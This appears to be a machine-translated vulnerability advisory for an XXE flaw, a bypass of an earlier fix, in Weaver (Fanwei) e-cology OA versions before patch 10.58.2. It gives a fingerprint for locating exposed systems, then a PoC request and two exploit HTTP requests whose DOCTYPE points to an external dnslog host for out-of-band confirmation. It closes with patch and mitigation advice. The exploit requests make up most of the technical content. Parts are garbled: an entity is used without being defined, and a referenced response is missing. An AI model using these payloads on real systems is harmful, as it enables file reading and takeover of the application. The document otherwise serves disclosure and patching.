0x01 Product Introduction
Pan-micro collaborative management application platform E-Cology is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, data center functions Enterprise large-scale collaborative management platform.
0x02 Vulnerability Overview
A certain function point of Fanwei e-cology initially does not filter user input perfectly, which can trigger XXE when processing user input. Subsequent repair rules can still be bypassed, and this vulnerability is the bypass of the previous repair rules. Attackers can exploit this vulnerability to list directories, read files, and even gain administrator privileges of the application system.
0x03 range of influence
Fanwei EC 9.x and patch version < 10.58.2
Fanwei EC 8.x and patch version < 10.58.2
0x04 Recurrence environment
Intergraph fingerprint: app.name="Fanwei e-cology 9.0 OA"
0x05 Vulnerability Reappearance
PoC
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
If the above response appears, there is a loophole
exp1
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
exp2
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
PS: The difference is that the vulnerability path is different
verify:
0x06 Repair suggestion
interim mitigation plan
Limit access source addresses, and do not open the system to the Internet unless necessary.
Upgrade Repair Solution
At present, 10.58.2 has been officially released to fix this vulnerability. It is recommended that affected users update to 10.58.2:
https://www.weaver.com.cn/cs/securityDownload.html#